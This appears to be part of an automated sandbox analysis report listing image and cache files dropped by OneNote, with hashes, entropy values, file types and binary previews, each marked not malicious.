                                                                                                                                                                                                              SHA-512:2ECC37F2BCB27C1D890F2F964AFED11E0852DE30D26B4C252BFA3A82247502D7AB42101A4F6EFE5BD61EE20ADC6B01C76A52AE0A69EC42ED48D9E08CB6B53AF2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........v...~...................................................................................................................................2...>...f.......v................................I.......I.qk..B.....LZg.w.....g.w[-.....*.r.&.g.w[-.....*.r.&.g.w..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.....................$8m.:..j....N...^....................'C..s..".........f...................................:....I.qk..B.....LZ....................$8m.:..j................$8m.:..j.........g.w.....g.w.....g.w.........................................g.wj....g.wT.]..g.w.....g.w..B..g.wH....g.w..B..g.w..>.)g.w..J...................;........4...4...4.."..............g.w.g.w.g.w..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........g.w.....g.w....#g.w............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:10:32], progressive, precision 8, 594x773, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):242903
                                                                                                                                                                                                              Entropy (8bit):7.944495275553473
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:YVxOYlZX2kCWfYoFMXC/sBFC9r+4iEGM4rrcPoWmwkU6FJ:+OwZ2kbFMC/L99ifvokU6/
                                                                                                                                                                                                              MD5:C594A4AA7234EF91E6C2714CFE1410F1
                                                                                                                                                                                                              SHA1:C0F720D4CE3196852814D0B7347F0CAA0C6FD526
                                                                                                                                                                                                              SHA-256:10C833E47BE1C8496F949A6B059C2D79212A4DD66BDE62116EA337FA4FE0B654
                                                                                                                                                                                                              SHA-512:7313F6545A334F9E2DE5430B2DB5C419C4C8A40E075338DAFCD74970BCC6309786946E5DFB57531612BF4C6269495655706D920FD99922FDACFF9796710DA9C0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:10:32.............................R.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...v&.F;-v;}FH..Z...N..)Y.......h;C....G.0W..ww...MI..Z+..\.........c..4.1.~.Yo.Y6.&. q...............l.A#.~s?yYg..7ky...r
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.313722090236628
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:YJs4z/6uuSyeD2EXMRoWXfBW9KCMRQyqE9TgW9LUU:yso/6uuSbDTXMRpXf89KCMRJq
                                                                                                                                                                                                              MD5:52E2335F5AFF950A48519A0600757345
                                                                                                                                                                                                              SHA1:CAC913A31E13FD6514C0A4F96FD2302982E92377
                                                                                                                                                                                                              SHA-256:7E4776078DB8A8F74CBABD267057861FAD624EE824DCAC20E8498FB335987606
                                                                                                                                                                                                              SHA-512:C831836AA9CA6DE9333AE3EA021B76EB4497F8D1553D4FD64E41F89BE01D7A0DACD1B593B5DC0038E5AAB84B5800882314D492618406098EF0B0AE3130A7B9C4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ.ev......evB.....C.@79B .evB.....C.@79B .ev..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............Q.h.).?.$....z......N...^................;P....F.y@.>.{.........f........................................I.qk..B.....LZ............Q.h.).?.$....z..........Q.h.).?.$....z............ev......ev......ev..........................................evj.....evT.]...ev......ev..B...evH.....ev..B...ev..>.).ev..J...................;........4...4...4.."...............ev..ev..ev..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........ev......ev....#.ev............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:12:29], progressive, precision 8, 598x766, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):70028
                                                                                                                                                                                                              Entropy (8bit):7.742089280742944
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:ub4bgbB7g9cKCmSzaNF0jAdAzQKTEFBQqUp/i0yG1pidLHTVX:ub4bIB7Qg2OjbzjgWp/i0yGCZx
                                                                                                                                                                                                              MD5:EC7811912ACA47F6AEB912469761D70D
                                                                                                                                                                                                              SHA1:C759BC2D908705D599B03BDB366C951B11F99A4E
                                                                                                                                                                                                              SHA-256:FBB4573E3BEE1B337077691BEBAE15D6FAC52432405D31396D526D7694A8283D
                                                                                                                                                                                                              SHA-512:881828150993A8C56E36CDA2051D89C1F6E0322643902C9506392C163E8734A2933A46486F40E5BC8C8D0164E180605E52620EF22FE14540AEA787A38B22E98E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....7Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:12:29.............................V.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................}.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....H.yM..? .Z.. .^.x..p.8.A...K.... .\{..)..y....t..=.^y)..v.@.W>. .h.. ..p.:.\)(.$....$.I).....!....E..Z.....&.5.).
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.326676262624994
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:TqHsjVLLzqtKFYnE5VLPYwvXWZMeBwv9eHotrdQqrIvpBXLsCkcB6at:Gslzq4FmE5VcwvXydBwv9eHERQyQpB5
                                                                                                                                                                                                              MD5:BD16B36F37B2224039B44606A0056F9C
                                                                                                                                                                                                              SHA1:DA22055AA5A6A0E01C4895D658DA686FD6A81EBF
                                                                                                                                                                                                              SHA-256:E04F56BE88BCA1649A0EE4B14C9F458A4BA9610742B72FF81E8CBB3033065168
                                                                                                                                                                                                              SHA-512:9B30B33776E67B2B0E762D4AA13AA3F78361CBE668BFE221B885A304AE90EE945D4EA8082786D2D4C367B614A664BA4DFAA98D141C62511FA46AC5568EF37031
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ..e.......e$....!).a...m..e$....!).a...m..e..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................g.2..a....x....N...^...............l..R.B.M....c.%H........f........................................I.qk..B.....LZ................g.2..a....x............g.2..a....x...........e.......e.......e...........................................ej......eT.]....e.......e..B....eH......e..B....e..>.)..e..J...................;........4...4...4.."................e...e...e..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4...........e.......e....#..e............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):24268
                                                                                                                                                                                                              Entropy (8bit):6.946124661664625
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
                                                                                                                                                                                                              MD5:3CD906D179F59DDFA112510C7E996351
                                                                                                                                                                                                              SHA1:48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
                                                                                                                                                                                                              SHA-256:1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
                                                                                                                                                                                                              SHA-512:2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.326724371883214
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:VXMsDwGchw6vt06i+tFUEr02X3T9KColrdQqrDV+DBX2bl/hwPQL0iFvb1:VXMsMvG670EjXD9KCURQy+Mhj
                                                                                                                                                                                                              MD5:B1C864E77D53605CA4DB900AE448DB0B
                                                                                                                                                                                                              SHA1:2462C187399903BCA4931A771936E9B3FDDA222E
                                                                                                                                                                                                              SHA-256:CA9C871B06B0ADD8643A85EC34403270A846C27FBBF913FF6FB8D29904D2E685
                                                                                                                                                                                                              SHA-512:E30B0A74AD3C5B1477120EE261911B16209871CCD80EF3CAD821A2E75BD700D28852044FC5270F25AAC9385717BC8A9E06FD7C4D4C2B1F5E77CE4721007C868A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ.iX......iX.....<.0.....iX.....<.0.....iX..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............d.....-.q.da`.....N...^................)..N'.B....T.#........f........................................I.qk..B.....LZ..............d.....-.q.da`...........d.....-.q.da`...........iX......iX......iX..........................................iXj.....iXT.]...iX......iX..B...iXH.....iX..B...iX..>.).iX..J...................;........4...4...4.."...............iX..iX..iX..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........iX......iX....#.iX............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):47294
                                                                                                                                                                                                              Entropy (8bit):7.497888607667405
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:aQ10VrIBdBvDpQrQ7P9/FUOLG2vTSeG9lkCsMKzXeMBk3CBp:aC0JIBL+QsOLG2+ZAC1KqM2I
                                                                                                                                                                                                              MD5:7A450E086AD14BA7D89BA5DB3D3AE6C7
                                                                                                                                                                                                              SHA1:E7AEAFCFCE476390E18C19456BDF6529D863D518
                                                                                                                                                                                                              SHA-256:BDD997068701ED3A00A224EB694B003C01AC69B857FE7B4147D6C34875B1632B
                                                                                                                                                                                                              SHA-512:9B6D50A6CDB6081DA107A2CDDB1BD2811A5764994C8E3F67D56CA81084BE0D068C27435154E867199F38688EA65E8DE02A56DCAC47D0F5E55F0FBB6598814938
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..A..Qa"..q..2.......B#...R%.r...$&b...3Ss.4dU6F.cE..'GC..t..5eufW......................!.1..AQ.aq..".....2BR......r.#3.d...b..Ccs.t......$4T...SD%5Ue&Vf............?..M.7(..).:.a.q.......>..[:O...afQ.uCO..U.....go.l..p..YqVklQ.{i.w&.]Z.\+JQw._.n.'.h..,.bj..X.].k&.Q.>gU..f...1|....[...jQ.%Zb.......t..........*..V..j.6....Vj..i.....?...IY.P.....$.j........[l.....S.4.J9.U\.......7I..[..=*N5....xW..../...=?n....uG.D..S.>...8..3........n.S....]k.*...4.>.R.o..{..l.H.#.^....<amG.m&.......,....wDY.W.m.X....We.IR.Nu...y..Z.l.._S.mr.m...y.]m.R.MT...6.5.5}.K..#%..k].7.Y.q]...%.r.7.R^jR..z.K.T[t.a..d.)glW.r.v,.`....O..^..o:.Uc.\..D....f..D......yt.Q...Y.....
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.493115670799448
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:nv0s8vCLo8L+t52EwLDeFLQIXRI96QDoprdQqr3+BXGakZ7vJ1:8sLck+KEwfNIXRI96QDQRQyuGbJ
                                                                                                                                                                                                              MD5:C0E49BB8C33610872592C608BBD32890
                                                                                                                                                                                                              SHA1:1AF40C845BA7799A9E62F10B915EA32716858020
                                                                                                                                                                                                              SHA-256:2C8B680149B676F4DD2245CFA55F68888A08CE3E6945AC4EE2140570D9B05083
                                                                                                                                                                                                              SHA-512:4F2E3F75C7038983A927898DD80F89C5FD88F6630AFCBCE6AE0594AE817D7A84F930AD3D8D0AFA62433DBD4180A8743E5D70F77BA50245594328C31459DD8E15
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......n...v...b...................................................................................................................................2...>...J.......v................................I.......I.qk..B.....LZCm......Cm..R" ...h....Cm..R" ...h....Cm...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............%.V."...,8.....0....N...^...............s...t.H..@...i%........f........................................I.qk..B.....LZ............%.V."...,8.....0........%.V."...,8.....0.........Cm......Cm......Cm..........................................Cm.j....Cm.T.]..Cm......Cm...B..Cm.H....Cm...B..Cm...>.)Cm...J...................;........4...4...4.."..............Cm..Cm..Cm...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........Cm......Cm.....#Cm.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 60 x 336, 4-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):347
                                                                                                                                                                                                              Entropy (8bit):6.85024426015615
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:6v/lhPtnlx/QulkWNY2V18A6Akp7eee1VDjMHCyLezyKUX5Gp:6v/7RrIubiA6AkpNhiyKe+
                                                                                                                                                                                                              MD5:78762C169F8B104CB57DFF5A1669D2DF
                                                                                                                                                                                                              SHA1:9638B71B584CD636834016A635ABF8D9C0887711
                                                                                                                                                                                                              SHA-256:E64FDCD0B108737D8B8F7B677029F924031D6BBAA50585D9C3DEF7C7E92ECAF2
                                                                                                                                                                                                              SHA-512:5ED899AAF73B72DEC32E171FFA112382667D5BF3FBA98C92E313E66C0A6975EA97068F4CD32B62283F18DBD5345C11E3610F7EEAC2F2DE71FC44593180B9CEAC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...<...P.............PLTE......................=l......bKGD....H....cmPPJCmp0712....Om......IDATh......@..aI...B..C..l...^.%.`....>.]..|0.....a...hb...0......q.......p"....;...K..x=...p...y.yy~J....|...\.......y..X.......'...>1...Ky..f....&........N`..f0..b...3.......`Z.3..3.....o.......4.&........SV...4.....IEND.B`.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.354729914326018
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:IhsiKheFElmeEXXQ9SGXkRQy8D7FsevB3Fm8:0swEiXXQ9SwkRJq
                                                                                                                                                                                                              MD5:E23CD18964ACFD11EDE150BD42476BCC
                                                                                                                                                                                                              SHA1:97610CF1ED2B5FFE5E9DD4381331F2AEE3402EB6
                                                                                                                                                                                                              SHA-256:CBB970400D83DC297A2BC464F052C9BF8C6E0FCEF89FAE388FD85323F5829D9D
                                                                                                                                                                                                              SHA-512:30EB3513CD7FFA58D88B2439BF64B51C9632A6B7DF0AB3362ACBBD8A2C41F4CD327E01299032D07E851C7BF993B9B04820BDE821CF406FB8F0D9D19B54BBD9C3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ`.......`.. .0./.eH..Y.`.. .0./.eH..Y.`....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................8)....Q.3.......N...^...............i-..B..I.....d..........f........................................I.qk..B.....LZ...............8)....Q.3..............8)....Q.3............`.......`.......`...........................................`..j....`..T.]..`.......`...B..`..H....`....B..`....>.)`....J...................;........4...4...4.."..............`...`...`....z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........`.......`......#`..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 40 x 617, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):827
                                                                                                                                                                                                              Entropy (8bit):7.23139555596658
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:6v/7Hs2NwBW1mtjeSfaTHHy05riYUtr8y8PQvPYzzg979Reip0QPqc:oOsotazy4rStr8y8PQIzWea0Qv
                                                                                                                                                                                                              MD5:3E675D61F588462FB452342B14BCF9C0
                                                                                                                                                                                                              SHA1:86B62019BC3C5BE48B654256B5D10293FC8C842A
                                                                                                                                                                                                              SHA-256:639EADAD468B6B32B9124B1F4395A8DA3027FF7258D102173BA070AE2ED541AE
                                                                                                                                                                                                              SHA-512:E6EA855B642ED36FA82F8E469A826DC57EB0C36E307045FF8D166F67AF9242C87840833BE31FBE4706DC54100E999D6A3D3A78D0633A3114735818874AD34758
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...(...i..........`PLTE...................................................................................................bKGD....H....cmPPJCmp0712....H.s....qIDATx^...0.Cg.;......@j..2c.=~KP.[H~..@..8...?U.g.n.a=.=.).....3..u^(.....L....5..........8.}..T.f.n.a=.=.).....3..u^(.....L..r....s..8.....W]....,..9..G?.a..`c.z...E.p...)Y.P.....#....@9.7].....,..9..G?.a..`c.z...E.p...)Y.P...`b....0.b.+~{.Pu...1..<..0._.l.@O.y.(...V3%..J....s... .(g.+.qyWu...1..<..0._.l.@O.y.(...V3%...%R.L.Q..x..R.<t.o......7.............:/.E..j.da@i..`b..Z......u.>.?...7.............:/.E..j.da@.Dj..9.W....s. .....:.......L...">w..7... .....:..."...L..."..a....D..Ya.l....E.{.@&.|.._...7..D..Ya.l.....{.@&.|....0.J.."z.0s..s....=g ..>........"z.0s..s....=g ..>..l..1...y..g......IEND.B`.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.282507380369011
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:us6lb7qdt1bYEX24LxXr9KTwxoOKrdQqrsPd5v+DBXuDtnIVrUV:ussqd7YEXnVXr9K8x0RQysPGDZrU
                                                                                                                                                                                                              MD5:64A419D12D29BB7BCDFF3979A1CCE897
                                                                                                                                                                                                              SHA1:CE042D64B8A3303FE2E6284528255FED0D695C0B
                                                                                                                                                                                                              SHA-256:922351DA61CD8F349320A0F7D5701984BE8C7FEC540064D5BE7D057F6501AD98
                                                                                                                                                                                                              SHA-512:7479B75BCD62DC6AFA266ECA3EC2E6D1408FE0DD1EEAEFB6B3AB73F49B34243E6F871198AD16578A2BF70FF0DEC6CF6D98B6F2179D6D2B47BAD4B7E96265EF61
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZiul.....iul..Py......M.|iul..Py......M.|iul..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..................v..0Y*._.......N...^....................,.E...X .WJ........f........................................I.qk..B.....LZ.................v..0Y*._................v..0Y*._............iul.....iul.....iul.........................................iulj....iulT.]..iul.....iul..B..iulH....iul..B..iul..>.)iul..J...................;........4...4...4.."..............iul.iul.iul..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........iul.....iul....#iul............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 50 x 600, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4410
                                                                                                                                                                                                              Entropy (8bit):7.857636973514526
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:E/pQuIhKZ7u06dICH3AroiTe8DGTl55poBUmLNjpH7MvDHjfm:MpdZtPbknnRPpkLNVMvu
                                                                                                                                                                                                              MD5:2494381A1ACDC83843B912CFCDE5643B
                                                                                                                                                                                                              SHA1:98F9D1CC140076D1AE5A9EA19F47658FD5DF0D66
                                                                                                                                                                                                              SHA-256:5EEBE803E434A845D19BC600DF3C75E98BB69BD0DE473CEEC410D1B3A9154E28
                                                                                                                                                                                                              SHA-512:0E64CC3723DC41D94910F7ADFB6A0DFB5049350FD15A873695614E4A89ABD78B166BA4E9C8CB95E275FB56981539DECD2A7F28FBC25E80DD5E2DEA8077CC9489
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...2...X.......E.....PLTE...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................B..(....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.].\TU.?3"...(..L........q.Q...H.*j......W..Xd.ie.f..%.XT...em..m.m.vkik...>.}..}|..{'.U..~......}....s.............,CVu.x.:C..5...;.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.334552225021651
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:YtsDCh4QEbB5EZnf0MBXoYB9yU7sRQy9p+ShShyhDhnhShOgJhhh:msMEkB0IXoM9yU7sRJe
                                                                                                                                                                                                              MD5:76E7C65D24DC02FA5A0C542E1B0F4FB6
                                                                                                                                                                                                              SHA1:74C1EFF5F165C55B83854799400E08167185B225
                                                                                                                                                                                                              SHA-256:381F2E6EBC5DF97504ACA410B86B9FA4D3DF0462E3371020E2182E4379BF9C16
                                                                                                                                                                                                              SHA-512:1A489CC0FC3090C3B7D0851CAC83546A193A9677BD1503D9FE1DF0B7B4EA7A785B564E63E29F16DEDD50B633363440C953F56DA78BDC55DB569E24F7F4588C72
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZl......l...+..:9>./...l...+..:9>./...l...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............Z..{.Yk....;W1X.....N...^...............i.!.[..C.b.6-.?.........f........................................I.qk..B.....LZ............Z..{.Yk....;W1X.........Z..{.Yk....;W1X..........l......l......l..........................................l.j....l.T.]..l......l..B..l.H....l...B..l...>.)l...J...................;........4...4...4.."..............l..l..l...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........l......l.....#l.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):136726
                                                                                                                                                                                                              Entropy (8bit):7.973487854173386
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:SIXmy5Tl704vW2ZKkvV8UU0ZWUF0BJwySIdgz816YzDc1+opecYPn:Sny5Tl704fZFV8UU6LGXwyS4xohpQPn
                                                                                                                                                                                                              MD5:4A2472AC2A9434E35701362D1C56EDDF
                                                                                                                                                                                                              SHA1:16FA2EA2D2808D75445896E03B67A93000EEDDD8
                                                                                                                                                                                                              SHA-256:505F731CB7707EFAB2EB06685B392DC7E59265A40B55AAE43E5DC15C0A86CBA4
                                                                                                                                                                                                              SHA-512:5E28D8FB2AC62ED270968072A30013334461F7CAE96058AF9EAA6E10912989DC47112D2133892BF61F7A516B77C6FF71BA2A000B750A9F95C787E538B09595C2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQaq".....2B....R#..b3...r...C$...X.....Sc...9.%'.(Hs4Dgw..T..5GW.x.)......................!.1..AQa"2.q.......B..#c........b6.Rr.3s$.&..S...C4.%5............?.........(......(......(......(......(......(......(......(.G/.GE&...)..P.x..B.({i2Y;.z?G...Yfc.)H..^....#.....}3..Sc^.H..+...M.a.P.....GS.....H_.3..<....1f........1.<.\..nn-..s.s.\9Y....=.......S.0.......N..cA..Io..r.3..........ay.....K.....,.;9..Q......xO.Fa.2..>........{4k.....|....?U....3.8..._/3....#.. t.y......yY.......e.<........#.....B.....Z.%.Y..S.ye.W4...l.......X...%.@y}>....l.yi..D..W......L..._D.Q....)...E....n.%...*..K.4#.8`..I....h..h.o..I......-...hB...3..u.(5..........n...,.@....a.t.9.....@.s.>.&...@
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.34528905429945
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:6siyRRhbdWLWVtKOuEKHLJxXIO9OIotrdQqrCpYBXih4ipTR0G:6svdWLWV4ZEKHLX/9OIURQyZoR
                                                                                                                                                                                                              MD5:C908951592005F4A84C96BAA774889F0
                                                                                                                                                                                                              SHA1:63EDAFEAC74AE67626A769738EF18BECEE63CB2E
                                                                                                                                                                                                              SHA-256:EBA1789F5FEEF92C629702A50241731F86DB210BC53E42BB8B9319226E7D01E8
                                                                                                                                                                                                              SHA-512:EE377EE1ADCE417FB5CF870D16593FF8B26480CC7E77BB728A5A57252727FA5E14AA7FB3B3AFE7A851966734AD2CB3337F58F3B72F8A381871F352E8B9EE7BEF
                                                                                                                                                                                                              Malicious:false
